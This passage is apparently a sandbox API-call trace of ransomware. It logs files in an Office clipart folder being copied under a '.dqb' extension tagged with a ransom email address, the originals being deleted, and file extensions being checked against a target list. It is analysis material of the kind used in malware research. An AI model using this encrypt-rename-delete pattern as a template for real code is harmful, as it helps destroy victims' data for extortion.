nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xba0, lpOverlapped=0x0) returned 1 [0058.220] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.220] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0058.220] SetEndOfFile (hFile=0x180) returned 1 [0058.220] CloseHandle (hObject=0x180) returned 1 [0058.220] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.220] SetEndOfFile (hFile=0x204) returned 1 [0058.221] CloseHandle (hObject=0x204) returned 1 [0058.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.221] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 1 [0058.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0058.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0058.222] lstrlenW (lpString=".doc") returned 4 [0058.222] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.222] lstrlenW (lpString=".docx") returned 5 [0058.222] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0058.222] lstrlenW (lpString=".pdf") returned 4 [0058.222] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.222] lstrlenW (lpString=".xls") returned 4 [0058.222] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.222] lstrlenW (lpString=".xlsx") returned 5 [0058.222] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0058.222] lstrlenW (lpString=".ppt") returned 4 [0058.222] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0058.222] lstrlenW (lpString=".zip") returned 4 [0058.222] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.222] lstrlenW (lpString=".rar") returned 4 [0058.222] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.222] lstrlenW (lpString=".bz2") returned 4 [0058.222] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.222] lstrlenW (lpString=".7z") returned 3 [0058.222] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0058.222] lstrlenW (lpString=".dbf") returned 4 [0058.222] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0058.222] lstrlenW (lpString=".1cd") returned 4 [0058.223] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0058.223] lstrlenW (lpString=".jpg") returned 4 [0058.223] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.223] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.223] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.224] GetLastError () returned 0x0 [0058.224] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2856, lpOverlapped=0x0) returned 1 [0058.225] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2860, lpOverlapped=0x0) returned 1 [0058.226] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.227] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0058.227] SetEndOfFile (hFile=0x180) returned 1 [0058.227] CloseHandle (hObject=0x180) returned 1 [0058.227] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.227] SetEndOfFile (hFile=0x204) returned 1 [0058.228] CloseHandle (hObject=0x204) returned 1 [0058.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 1 [0058.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0058.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0058.228] lstrlenW (lpString=".doc") returned 4 [0058.229] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString=".docx") returned 5 [0058.229] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0058.229] lstrlenW (lpString=".pdf") returned 4 [0058.229] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString=".xls") returned 4 [0058.229] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.229] lstrlenW (lpString=".xlsx") returned 5 [0058.229] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0058.229] lstrlenW (lpString=".ppt") returned 4 [0058.229] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0058.229] lstrlenW (lpString=".zip") returned 4 [0058.229] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.229] lstrlenW (lpString=".rar") returned 4 [0058.229] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString=".bz2") returned 4 [0058.229] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString=".7z") returned 3 [0058.229] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0058.229] lstrlenW (lpString=".dbf") returned 4 [0058.229] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0058.229] lstrlenW (lpString=".1cd") returned 4 [0058.229] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0058.229] lstrlenW (lpString=".jpg") returned 4 [0058.229] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.230] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.230] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.231] GetLastError () returned 0x0 [0058.231] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x7992, lpOverlapped=0x0) returned 1 [0058.232] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x79a0, lpOverlapped=0x0) returned 1 [0058.234] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.234] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.234] SetEndOfFile (hFile=0x180) returned 1 [0058.234] CloseHandle (hObject=0x180) returned 1 [0058.234] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.234] SetEndOfFile (hFile=0x204) returned 1 [0058.235] CloseHandle (hObject=0x204) returned 1 [0058.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 1 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0058.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0058.235] lstrlenW (lpString=".doc") returned 4 [0058.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.235] lstrlenW (lpString=".docx") returned 5 [0058.235] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.235] lstrlenW (lpString=".pdf") returned 4 [0058.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.236] lstrlenW (lpString=".xls") returned 4 [0058.236] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.236] lstrlenW (lpString=".xlsx") returned 5 [0058.236] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.236] lstrlenW (lpString=".ppt") returned 4 [0058.236] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0058.236] lstrlenW (lpString=".zip") returned 4 [0058.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.236] lstrlenW (lpString=".rar") returned 4 [0058.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.236] lstrlenW (lpString=".bz2") returned 4 [0058.236] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.236] lstrlenW (lpString=".7z") returned 3 [0058.236] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0058.236] lstrlenW (lpString=".dbf") returned 4 [0058.236] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0058.236] lstrlenW (lpString=".1cd") returned 4 [0058.236] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0058.236] lstrlenW (lpString=".jpg") returned 4 [0058.236] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.237] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.237] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.238] GetLastError () returned 0x0 [0058.238] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2040, lpOverlapped=0x0) returned 1 [0058.535] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2050, lpOverlapped=0x0) returned 1 [0058.607] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.611] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.617] SetEndOfFile (hFile=0x180) returned 1 [0058.627] CloseHandle (hObject=0x180) returned 1 [0058.641] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.641] SetEndOfFile (hFile=0x204) returned 1 [0058.642] CloseHandle (hObject=0x204) returned 1 [0058.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.642] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 1 [0058.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0058.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0058.643] lstrlenW (lpString=".doc") returned 4 [0058.643] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.643] lstrlenW (lpString=".docx") returned 5 [0058.643] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.643] lstrlenW (lpString=".pdf") returned 4 [0058.643] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.643] lstrlenW (lpString=".xls") returned 4 [0058.643] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.643] lstrlenW (lpString=".xlsx") returned 5 [0058.643] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.643] lstrlenW (lpString=".ppt") returned 4 [0058.643] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0058.643] lstrlenW (lpString=".zip") returned 4 [0058.643] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.643] lstrlenW (lpString=".rar") returned 4 [0058.643] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.643] lstrlenW (lpString=".bz2") returned 4 [0058.643] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.643] lstrlenW (lpString=".7z") returned 3 [0058.643] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0058.643] lstrlenW (lpString=".dbf") returned 4 [0058.643] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0058.643] lstrlenW (lpString=".1cd") returned 4 [0058.643] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0058.644] lstrlenW (lpString=".jpg") returned 4 [0058.644] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.644] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.644] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.645] GetLastError () returned 0x0 [0058.645] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x73bc, lpOverlapped=0x0) returned 1 [0058.662] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x73c0, lpOverlapped=0x0) returned 1 [0058.663] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.663] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.663] SetEndOfFile (hFile=0x180) returned 1 [0058.664] CloseHandle (hObject=0x180) returned 1 [0058.664] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.664] SetEndOfFile (hFile=0x204) returned 1 [0058.665] CloseHandle (hObject=0x204) returned 1 [0058.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 1 [0058.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0058.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0058.665] lstrlenW (lpString=".doc") returned 4 [0058.665] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.665] lstrlenW (lpString=".docx") returned 5 [0058.665] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.665] lstrlenW (lpString=".pdf") returned 4 [0058.665] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.665] lstrlenW (lpString=".xls") returned 4 [0058.665] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.665] lstrlenW (lpString=".xlsx") returned 5 [0058.666] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.666] lstrlenW (lpString=".ppt") returned 4 [0058.666] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0058.666] lstrlenW (lpString=".zip") returned 4 [0058.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.666] lstrlenW (lpString=".rar") returned 4 [0058.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.666] lstrlenW (lpString=".bz2") returned 4 [0058.666] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.666] lstrlenW (lpString=".7z") returned 3 [0058.666] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0058.666] lstrlenW (lpString=".dbf") returned 4 [0058.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0058.666] lstrlenW (lpString=".1cd") returned 4 [0058.666] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0058.666] lstrlenW (lpString=".jpg") returned 4 [0058.666] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.667] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.667] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.668] GetLastError () returned 0x0 [0058.668] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xa82, lpOverlapped=0x0) returned 1 [0058.669] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xa90, lpOverlapped=0x0) returned 1 [0058.670] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.670] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.670] SetEndOfFile (hFile=0x180) returned 1 [0058.670] CloseHandle (hObject=0x180) returned 1 [0058.671] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.671] SetEndOfFile (hFile=0x204) returned 1 [0058.671] CloseHandle (hObject=0x204) returned 1 [0058.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.672] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 1 [0058.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0058.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0058.672] lstrlenW (lpString=".doc") returned 4 [0058.672] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.672] lstrlenW (lpString=".docx") returned 5 [0058.672] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.672] lstrlenW (lpString=".pdf") returned 4 [0058.672] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.672] lstrlenW (lpString=".xls") returned 4 [0058.672] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.672] lstrlenW (lpString=".xlsx") returned 5 [0058.672] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.672] lstrlenW (lpString=".ppt") returned 4 [0058.672] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.672] lstrlenW (lpString="C:\\Program Files\\Microsoft 